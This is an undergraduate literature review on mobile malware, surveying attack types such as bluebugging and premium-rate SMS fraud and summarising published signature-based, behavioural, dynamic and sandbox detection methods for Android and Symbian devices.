Abstract—Since
the past ten years, smartphones have become widespread. These small devices are
growing rapidly with the emergence and popularity of wireless technology.
Mobile devices store personal information such as contacts and text messages. While
these devices are increasingly preferred in all ages, they are vulnerable to be
hurt by malicious codes such as viruses, worms, and so on. As the development
of functionality of these devices, the ability to get exploited by malicious activities
has also increased. The evolution of mobile malware is thought to have the same
direction as PC malware.
I.
INTRODUCTION
Mobile phones have
evolved to support multiple functions. As mobile phone functionality improves, the
ability to get exploited by malicious activities has also increased. For
various services such as social networking and games provided from smartphones
with the help of 3rd party applications, these are released to
obtain sensitive information from mobile devices. There are many kind of
smartphone OSs in the world. The most popular one is Android. Any Third-party
vendors can create applications for running on Android devices and put them on
the app market such as Play store. In some cases, even a trusted application
can share the user's information to others without its consent. The evolution
of malware on mobile devices is widely considered to have the same direction as
PC malware evolution. Mobile devices incorporate a variety of wireless
communication methods, which make it easy to connect, making it a simple target
for malware. Like Computers (PC), the mobile devices can access the Internet for
web browsing and emails. It also has a function to communicate with WLAN, SMS/MMS,
Bluetooth connection. It’s most important and interesting reason to believe
that attackers use mobile devices since its way more popular among the users. However,
with the help of technology and detection algorithms for development, special attention is needed to protect these network
devices from malware.
II.
Research Objectives
Due to the
expansion of mobile devices in the world, the no of malware attacking mobile
devices is also increasing. special attention is needed to protect these devices
from malware. There are many types of threats on mobile devices. Some of them
will be described in the section III. In addition to that, the history of
mobile threats will be discussed. Many researchers have done various kind of
researches regarding to that particular topic. In the section IV, a review of
that publications will be discussed.
III.
Definitions and Categories
A.
Types of Attacks
The work by Dagon et al. [1] has been
examined the attacks types. These attacks types have been listed below.
Table 1: Types of Mobile Attacks
Security Goals
|
Attacks Types
|
Confidentiality
|
Theft of data, blue-bugging, blue-snarfing
|
Integrity
|
Mobile-hijacking
|
Availability
|
Denial-of-service and battery draining
|
1)
Theft of data
It is an act of stealing
information stored on a computer, server, or other device from an unknown
victim, infringing privacy or obtaining confidential information. Attackers
always try to obtain dynamic and static information. Dynamic information contains
location data, power usage, and other sensitive data, that the device does not
usually capture [1]. Static information contains data that mobile devices store
or send over the network. The blue-snarfing and blue-bugging attacks are examples
of theft of data. The blue-bugging attack gives unauthorized access to the mobile
phone and spies phone calls. However, this attack has moved along to being able
to control/move around/mislead the different functions of the phone [1]. Blue-snarfing
attack is unauthorized access and data retrieval from applications.
2)
Denial-of-Service (DoS)
DoS can be done by
flooding unusual traffic to the device. And also it can be done by draining the
power or performance of the mobile devices. Now, it is very easy to crash most
Bluetooth applications on mobile devices by sending useful packets, corrupted
packets and wrong file formats repeat. DoS is a major attack type that can be
exploited known vulnerabilities [2].
3)
Mobile-hijacking
Some harmful programs or
apps tries to use the victim's mobile resources. Pilfered duplicates of PC
recreations were contaminated with infections that sent costly SMS messages
when clients played unlawful duplicates. Hijacking phone resources are not
unexpected.
B.
Threats on Mobile Devices
These are
malicious software targeting mobile phones and wireless compatible PDA, causing
system collapse and loss or leakage of confidential information by means of WLAN
Bluetooth, SMS/MMS. There are various assault vectors, undermining the security
of cell phones. There are three main types of attacks: malware attacks,
grayware attacks, spyware attacks.
1)
Malware
This type of
attack steals the sensitive information of mobile devices. And also these
attacks can damage the devices [22]. If the device is vulnerable and tricks the
user to install unwanted applications that the attacker can get the device root
access. There are many types of malware. Several attacks are shown below.
a)
SMS attacks
In SMS attacks,
an attacker can advertise and disseminate phishing links. An attacker can also
exploit vulnerabilities by using SMS messages [22].
b)
Bluetooth attacks
In Bluetooth
attacks, an attacker can steal victim sensitive data from the device, and track
the mobile location. With Blue-bugging, an attacker can launch software
containing malicious activity and listen to conversations [22].
c)
Phone jail-breaking
With
jail-breaking, an attacker can remove the effect on the security of the operating
system and it allows to install applications without additional signatures on
the OS. It attracts users to take advantage of additional features [22].
d)
Premium rate attacks
The premium rate service can deliver
valuable useful content to the mobile devices. Users can receive information
about financial, technical support, or adult services When used in a legitimate
way [22].
2)
Spyware
Spyware is
another type of attack that is installed on a computer or mobile devices without
knowledge of the owner and collects the owner's personal information. By
installing applications without user permissions, spywares can access the
device physically. By collecting information about the victim's phone, it is
sent to the attacker.
3)
Grayware
Graywares are
applications that act in a way that is irritating or undesirable. Most
probably, grayware collects the data from mobile devices for marketing
purposes. Their goal is not to hurt clients but rather to trouble them.
C.
Attacks on Mobile Devices
Looking at the history
of attacks, many Trojan horses, worms and viruses have entered the mobile world
and are being influenced. Well known examples for some threats on Symbian-based
smart phones include Cabir, Skull and Mabir [1]. Many of these variants viruses
strengthen the attack and reveal unexpected and unexpected levels of exposure.
According to McAfee 2008, mobile security report, almost 14% of worldwide
versatile clients had been specifically tainted or had known somebody who was
contaminated by a portable infection. The one of the key characteristics that
differentiate threat actors is Motivation. Despite the fact that not each actor
needs to take information amid each battle to fulfill a goal, many crusades
require it. Figure 1 below describes the motivations of threat actors [3].
State-based entities
generally try to gain strategic advantage, but it often targets intellectual
property rights. The financial goal of an organized criminal makes it easy to
understand its motivation. It tends to focus on large credit cards, banking
transactions, or personally identifiable information.
Hacktivists are probably
the hardest to stop, as internal data can affect the reputation of the
organization.
Most of, Much of
security breaches in past years have been easily detectable. They were complex
with arranging, focusing on, stalking and running. According to the McAfee et al.
[3], a change during the past two years, with a significant increase in the
number of technically sophisticated attacks has been identified. It looks like
fragmentary invasion, but it is hiding in inactive code, waiting for an
unprotected moment. These threats avoid signature-based ancestor traps, changes
by new deployment using encryption and dynamic code changes, and prevent data
corruption.
Since the popularity of
Android OS, the possibility of being vulnerable is at higher level. The malware
called Slocker rose to become a more prominent threat in 2015 [4]. Slocker's
growing popularity indicates that mobile malware targets content stored on the
device.
If one malicious program
shares another code or behavioral feature, it is usually considered to belong
to the same family.
Individual threats of
malware families are often detected by security software and identify the
essential characteristics of families. Figure 3 describes top ten android
malwares in 2015 and the things that they are going to do according to the F-Secure
Threat Report 2015.
D. Approaches in Malware Detection
Malware needs to
be analyzed to understand the risks associated with malwares. In order to
clarify the behavior and function of malware, many detection methods exist in
the literature. In recent years, interest in malware detection technology of
mobile devices has increased. Three main approaches were considered.
1)
Static analysis
Static analysis
inspects software properties and source code to investigate downloaded app. However,
software encryption technology makes static analysis difficult. Static analysis
is further divided into two categories.
a)
Signature-based detection
Signature-based
detection uses specific patterns such as byte sequences or known malicious
instruction sequences to detect attacks. In this detection method, the detected
patterns are referred as signatures [5]. Signature detection can identify malicious
activities before infecting.
b) behavior-based detection
This is another
general technique that looks for abnormal behavior based on the operation
checker resident in memory. In this matter, the user is alerted. Behavior
checkers have the disadvantage that some changes have been made to the system
before malicious activity is detected.
2)
Dynamic analysis
Dynamic analysis
runs the application in a different environment and tracks its execution
behavior. Dynamic analysis can be used to reveal the natural behavior of
malware when the executed code is analyzed. Therefore, it is not affected by
obfuscation attempt.
3)
Integrity Checking
Integrity checking uses a log of all files
existing in the system. The log contains information of files such as file
size, timestamp, checksum, etc. Each time the integrity checker runs, the files
on the system are checked and compared with previously saved characteristics.
IV.
Review Of The Literature
Some relevant related work that includes the
above-mentioned malware detection techniques will be presented and reviewed.
D.Venugopal et al.
[5], has described a method of representing signatures for detecting viruses in
mobile devices. In this, the hash table is used to store hash values of virus
signature for fast matching. The first matching signature cut was used to speed
up that process. This represents a part that is unlikely to occur in a regular
file before matching the whole signature. Nokia 6682 device running on Symbian
OS was used to test this method. As a result, this method was 98% faster than
the sequential scan. Using this method, new malware which completely different
from the previous malware cannot be detected. To improve the detection, this
method needs to be combined with more sophisticated malware detection methods
such as heuristic scanning and detection. As the virus evolved, the technology
to protect the virus had to evolve. The detection of malicious code in this
context includes more sophisticated approaches such as heuristics and behavior
analyzers [6].
D. Venugopal, G.
Hu, and N. Roman et al. [7], have described a method that is different to the
previous. In there an intelligent heuristic method is used to detect viruses in
the mobile devices. It uses Dynamic Link Libraries (DLLs) to detection. The
virus uses the list of DLL functions to indicate the nature of the virus on
that function. With this approach, new viruses can be detected. According to
the research, Symbian-OS is used to test this method, and for non-virus
programs, it has got 95% detection rate and 0 false detection rate for all
viruses.
F. Peters, A. Shmidt,
S.Albayrak and F.Lamour et al. [8], describe a machine learning algorithm for
detecting malicious activity of mobile devices such as smartphones. A remote
anomaly detection system performs anomaly detection. Each smartphone behaves as
a client and sends a series of functions pulled out by studying different resources
measurements, hardware and software to the remote anomaly detection system.
These functions are stored in the database. The detection components access the
database to analyze malicious activity data. Using Symbian-OS and Windows
Mobile, this method has been tested. As a result, there are disk space savings,
computational and communication cost savings, and positive impact on battery
life.
Kim at el. [9] has
shown a Proposal of a framework for detecting and monitoring threats of energy
greed by constructing power usage from gathered instances. After generating the
power signatures, the signatures available in the database is compared by the data
analyzer. Batyuk et al. [10] proposed a system for static analysis of android
applications. Next, the method is developed by overcoming the security threat
introduced by the application and disabling malicious functionality. Ontang et
al. [11] proposed a secure application interaction framework. It works by increasing
the architecture of android security for protection of interfaces and raising
interaction policies.
J. Cheng et al.
[12] presented a behavior checking system for smart phone called SmartSiren that
consists of cooperative virus detection and alert system. On each smartphone,
there is a system that running a light-weight agent. The agent tracks
communication activity on the device and periodically reports the summary of
these activities to the proxy. A centralized proxy is used to assist the virus
detection and alert processes. The proxy collaboratively analyzes the reports
received and identifies single-device or system-wide virus manner. When a
potential virus is detected, the proxy sends an alert to both the infected
device and a subset of the infected device (which may be in direct contact with
the infected device). As a result, SmartSiren prevents wide area virus
outbreaks. A better result can be obtained by using this method instead of
using signature based detection.
Bose et al. [13]
presented a behavioral detection framework. It works in a way of representing
the malware behavior. It discovers applications actions logical order to do
that. Malicious behavior is distinguished from normal behavior by training the
SVM. The system is evaluated with an accuracy of 96% for both real world and
pseudo mobile malware.
The method
called pBMDS based on behavior-based malware detection has been described by L.
Xie et al. [14]. It uses an approach that is probabilistic by matching user
inputs with system calls to detect distrustful activities in mobile phones. It
observes the specific behavior of mobile phone applications and operations
users on input and output constrained devices. Hidden markov model(HMM) is
leveraged to learn user-behavior and malware behavior for discrimination of
differences between them. As a result, pBMDS was shown to be effective,
lightweight, easy to deploy, and capable of detecting unknown malware.
Wei et al. [15]
proposed a static feature-based approach and developed a system called Droid
Mat that can detect and distinguish android malwares. Their mechanisms consider
the static information characterizing android malware about access permissions,
intents, and components, and apply a clustering algorithm to enhance malware
modeling capabilities. Finally, DroidMat is efficient as it can predict 1738
applications in half the time compared to Androguard, a well-known tool
published in Blackhat 2011.
Enck et al. [16],
proposed Apps-playground framework for automatic dynamic analysis of android
applications. This allows to analyze malicious applications as well as
applications that leak personal data from smartphones without user consent. For
dynamic analysis, a detection technique including a function of searching
application code as much as possible is necessary, and the environment must be
realistic to the extent that a malicious application cannot be obfuscated.
Automated analysis code effectively explores applications by integrating
discovery. Detection technology detects malicious functionality while running
applications. It includes suspicious traces that monitor TaintDroid’s
confidential information APIs, such as the SMS API, and perform kernel-level
monitoring for tracing of root exploits. Automatic exploration techniques are
useful for code coverage of applications by simulating events. For automatic
discovery of android applications, intelligent black box execution tests and
Fuzzy tests are used. Disguise technology creates a realistic environment by
providing data such as IMEI, contacts, SMS, GPS coordinates etc.
An Android
application sandbox (AA sandbox) system was proposed by T. Blasing et al. [17] for
analysis of android application consists of high speed static pre-check
function and kernel space sandbox. Static analysis and dynamic analysis are used
to perform distrustful application detection in the android application. AA Sandbox
takes APK file and find out following files by decompressing
them-Androidmanifest.xml, res/, classes.dex.
Security
permissions and application descriptions are contained in the manifest file. The
Res/ folder defines the layout, the graphical user interface (GUI) element and the
language of the application. The Classes.dex file includes runnable program code
to run on the dalvik VM. This code is compiled into a Java file using baksmali
and it searches for suspicious code patterns. Monkey program is created for
application stress testing. These monkey programs generate a pseudo-random sequence
of user events. This is used for hijacking logging operation system calls and
is useful for obtaining application logging behavior at the system level. For
testing purposes, approximately 150 applications are gathered [17].
A dynamic
analysis system supported runtime behavior for android applications has been
presented by L. X. Min and Q. H. Cao et al. [18]. That system includes event
detector, log monitor and parser. Event triggers can use static analysis to
simulate user behavior. The static analyzer gets the support of the application
.apk file and generates manifest.xml and java code. Semantic analysis retrieves
a list of risk-based permissions, activities, and services, including other
information such as hash codes and package names. A control flow graph (CFG) about
an application is generated by dataflow analysis [18]. It uses a way of mapping
user-defined methods and API calls to do that. Confidential information on
applications can be obtained by executing applications with customized emulators
using loadable LKM. In the log recorded by the debug tool logcat, highly
confidential operation is sent to the log parser. The log monitor analyzes the
log data by collecting log data while the application is running. The parser
analyzes the log data by extracting confidential information and filtering
unnecessary information. 82 of 350 apps that were got from Amazon Android
market showed that they leak the user’s private sensitive data [18].
The authors mentioned
a method called Paranoid Android [19]. It uses remote security servers which
has exact copy of the mobile phones in virtual environment. It is for checking the security of smart
phones. Because the server is not subject to the same constraints as smart
phones, multiple detection methods can be applied simultaneously. The execution
of the phone is recorded and played on the security server in the cloud. Paranoid
Android uses a warning mechanism to warn the user about the malicious activity
that is going to be happen, when an attack is detected. If the device is already
sieged by the attack, it can be returned to. Using an Android mobile phone, the
prototype of Paranoid Android was tested [19]. As a result, even during the
high activity period, the transmission overhead is maintained at 2.5 Kbps or
less, the idle period is shortened, and the battery life is shortened by about
30%.
A framework for
a background monitoring system is described by M. Becher and F.C. Freiling et
al. [20]. It works by collecting the software to be installed by the user on
the device and automatically perform a dynamic analysis of the software. The
analysis system uses mobile networks as analysis locations rather than mobile
devices for two reasons. First, mobile networks have more computing power to carry
out more thorough analysis. Second, since it is easier to handle compared to
handling local connections, it is pretended that mobile network will deliver
the most software. Therefore, suspicious manner in the mobile network is analyzed
by software before the user installs the software on the mobile device. The automatic
dynamic analysis where system calls are recorded and malicious acts are
analyzed helps to do that. There are three stages that dynamic analysis is
done. In the first stage, the software components are collected. In the second
stage, we collected samples are analyzed with specific modules called mobile sandboxes.
This method is similar to the process described by T. Blasing [17]. This module
runs the sample in an environment where steps of the examined sample can be
watched. This will result in a series of API calls used during program
execution. The third step is providing a response to the analysis. When
malicious activity is detected the installation of the software can be rejected
by mobile network operators. It also might send a message to alert the user
that the program violates the user’s or network’s security profile.
In additions to
these methods, an architecture for automatic downloading of android
applications from the android market has been proposed by R. Johnson, Z. Wang,
C. Gagnon et al. [21]. Various algorithms used to search applications, such as
downloading applications by application category. With static analysis, required
permissions can be obtained based on its functionality. The authorization name
is searched in the Android source code and mapped in the API call to see if the
requested access right is correct. The program examines all the files of the
application and gets a list of method calls used by the application. Each
method call is then compared with the method calls listed in the permission
protected Android API call to find the exact permissions. The similarities and
differences are identified in the restricted permission set by comparing them with
all the permissions nominated in the AndroidManifest.xml file [21], no
additional permissions, no access rights, and no permission set required for the
function.
V. FUTURE RESEARCH
The threat
associated with mobile malware is expanding due to the expansion of mobile
devices all over the world. New malicious mobile programs are introduced daily
with the incrementing of the mobile technologies. Mobile devices are the
majority of our daily lives, Connecting us to social media, banking, videos,
gaming, online shopping etc. Therefore, preventing of those mobile threats are
highly recommended. In the review, the history and the current state of mobile
malware detection techniques have been discussed. The future of mobile malware
and detection techniques should be talked to make the future better.
In the review,
it was shown that anomaly detection is mainly performed by a proxy that is off
from the attack source. This type of detection concept has two main advantages.
First, a large processing speed and power usage are required by the large-scale
detection solutions. Second, as the reactive approach is always better than
being aggressive, the proxy can inform other users of potential attacks before
the entire network is involved in malware activity. Because reactive approach
is always better than proactive. Based on the outline of a quickly changing
attack, there is no way to specify one method for the future of virus
detection. The thing that is required is an efficient malicious activity
detection method. The spread rate can be reduced by it and also could be
applied at network level to protect the spreading through network routes. It
seems that there is a high possibility that the malicious code detection
technology that will appear in the future will be essentially distributed. It
is thought that focus will shift from endpoint protection to network-wide
protection. There are several recommendations for designing algorithms to
detect mobile-based applications including malware. These are:
To build a
feature set that detects mobile malware, multiple feature extraction sources
are needed.
In order for
developers to recognize vulnerabilities related to mobile malware, domestic and
foreign databases are required to report malware incidents.
Machine
communication and authentication tools must be used across multiple device
platforms.
To improve the detection
rate, an artificial intelligence algorithm should be used.
This review
forms the foundation for future work on mobile malware detection. It has also
established the framework of investigation necessary to advance towards the
development of the network-wide protection framework.
VI. Conclusion
Smartphones are becoming increasingly popular in positions of power, sensors and communication. Modern smartphones offer many services such as messaging, Internet browsing, e-mail transmission, games etc. in addition to traditional voice services. Because of its multifunctionality, new security threats are emerging in mobile devices. This paper is a review of malware detection techniques for mobile devices. Additionally, the history and current situation of mobile threats and vulnerabilities have been discussed in this paper. Problems related to traditional signature-based detection methods are also highlighted. Various mobile malware detection methods were described. This paper provides sufficient literature for the researchers on the mobile malware detection methods and hope that it will motivate the researchers and practitioners to examine mobile security issues and its applications.
Acknowledgment
This work very
well supported in part of all the authors who has shared their knowledge along
with their researches mentioned in the below. And we thank our supervisor who
in charge of this module Mr.Amila Nuwan Senarathne who guided us throughout the
semester.
References
[1] D.
Dagon,T. Martin, and T. Starner, “Mobile Phones
as Computing Devices, the Viruses are Coming!,” Pervasive
Computing, IEEE, vol. 3, no. 4, Oct-Dec.
2004, pp. 11-15.
[2] Q. Yang, R.
H. Deng, Y. Li, and T.Li, “On the Potential of Limitation-oriented Malware Detection and
Prevention Techniques on Mobile
Phones,” International Journal
of Security and
its Applications, vol. 4, no. 1, Jan. 2010.
[3] McAfee
Labs. “McAfee Labs Threats Report”, August 2015.
[4] F-Secure.
“Threat Report”, 2015.
[5] D. Venugopal, “An Efficient Signature Representation
and Matching Method for Mobile Devices,” Proc.
2nd Annual International workshop on Wireless Internet (WICON
’06), Boston, MA, United States, 2006.
[6] A.
Shevchenko, “Malicious Code Detection Technologies,” Kaspersky Lab, Inc.2008.
[Online]. Available: https://pdfs.semanticscholar.org/36a6/675b54a963aa4cba708882f1e172536a5dba.pdf
[7] D.
Venugopal, G. Hu, and N. Roman, “Intelligent Virus Detection on Mobile
Devices,” Proc. International Conference on Privacy, Security and Trust: Bridge
the Gap between PST Technologies and Business Services (PST’06), Ontario,
Canada, 2006, pp.1-4.
[8] A. Shmidt, F. Peters, F. Lamour, and S. Albayrak,
“Monitoring Smartphones for Anomaly Detection,” Proc. 1st International
Conference on MOBILe Wireless MiddleWARE, Operating Systems, and Applications,
2008.
[9] H.Kim,
J.Smith, K.G.Shin, “Detecting energy-greedy anomalies and mobile malware
variants”, Proceedings of the 6th international conference on Mobile systems,
applications, and services, pp.239-252.ACM, 2008.
[10] L.
Batyuk, M. Herpich, S. A. Camtepe, K. Raddatz, A. D. Schmidt and S. Albayrak, “Using
static analysis for automatic assessment and mitigation of unwanted and
malicious activities within Android applications,” 2011 6th International
Conference on Malicious and Unwanted Software, Fajardo, 2011, pp. 66-72.
[11] M.Ongtang,
S.E.McLaughlin, W.Enck, P.D.McDaniel, “Semantically rich application-centric security in
android”, In Proceedings of
the 25th Annual Computer
Security Application Conference (ACSAC), pp.340-349, 2009.
[12] J.
Cheng, S. Wong, S. H. Y. Wong, H. Yang, and S. Lu, “Smart Siren: Virus
Detection and Alert for Smartphones,” Proc. 5th International
Conference on Mobile Systems, Applications and Services (MobiSys ‘07), San
Juan, Puerto Rico, pp. 258-271, 2007.
[13] A.
Bose, X. Hu, K.G.Shin, T.Park, “Behavioral detection of malware on mobile
handsets”, In MobiSys ’08, Proceeding of the 6th international conference on Mobile systems, applications, and
services, pp.225-238, ACM, New York, 2008.
[14] L.
Xie, X. Zhang, J. Seifert, and S. Zhu, “pBMDS: A Behavior-based Malware
Detection System for Cellphone Devices,” Proc. Third ACM Conference on wireless
Network Security (WiSec’10), Hoboken, New Jersy, USA, 2010.
[15] D.
J. Wu, C. H. Mao, T. E. Wei, H. M. Lee and K. P. Wu, “DroidMat: Android Malware
Detection through Manifest and API Calls Tracing,” 2012 Seventh Asia Joint
Conference on Information Security, Tokyo, 2012, pp. 62-69.
[16] V.
Rastogi, Y. Chen, W. Enck, “AppsPlayground: Automatic Security Analysis of
Smartphone Applications”, In CODASPY'13
Proceedings of the third ACM
conference on Data and application security and privacy, pp.209-220. ACM, 2013.
[17] T.
Bläsing, L. Batyuk, A. D. Schmidt, S. A. Camtepe and S. Albayrak, “An Android
Application Sandbox system for suspicious software detection,” 2010 5th
International Conference on Malicious and Unwanted Software, Nancy, Lorraine,
2010, pp. 55-62.
[18] L.
X. Min, Q. H. Cao, "Runtime-Based Behavior Dynamic Analysis System for
Android Malware Detection", Advanced Materials Research, Vols. 756-759,
pp. 2220-2225, 2013.
[19] G.
Portokalidis, P. Homburg, K. Anagnostakis, and H. Bos, “Paranoid Android: Versatile Protection for Smartphones,” Proc. 26th
Annual Computer Security Applications Conference (ACSAC’10), Austin, Texas,
USA, pp. 347-356, Dec. 6-10, 2010.
[20] M.
Becher and F.C. Freiling, “Towards Dynamic Malware Analysis to Increase Mobile
Device Security,” Proc. SICHERHEIT, pp. 423-433,
2008.
[21] R. Johnson, Z. Wang, C. Gagnon and A. Stavrou, “Analysis
of Android Applications' Permissions,” 2012 IEEE Sixth International Conference
on Software Security and Reliability Companion, Gaithersburg, MD, 2012, pp.
45-46.
[22] D.
Stites, A. Tadimla “A Survey of Mobile Device Security: Threats,
Vulnerabilities and Defenses”, 2011. [Online]. Available: http://afewguyscoding.com/2011/12/survey-mobile-device-security-threats-vulnerabilities-defenses/
A.A.C.S Wickramasinghe, Undergraduate, SLIIT
G.A.A.I.S De Silva, Undergraduate, SLIIT  |
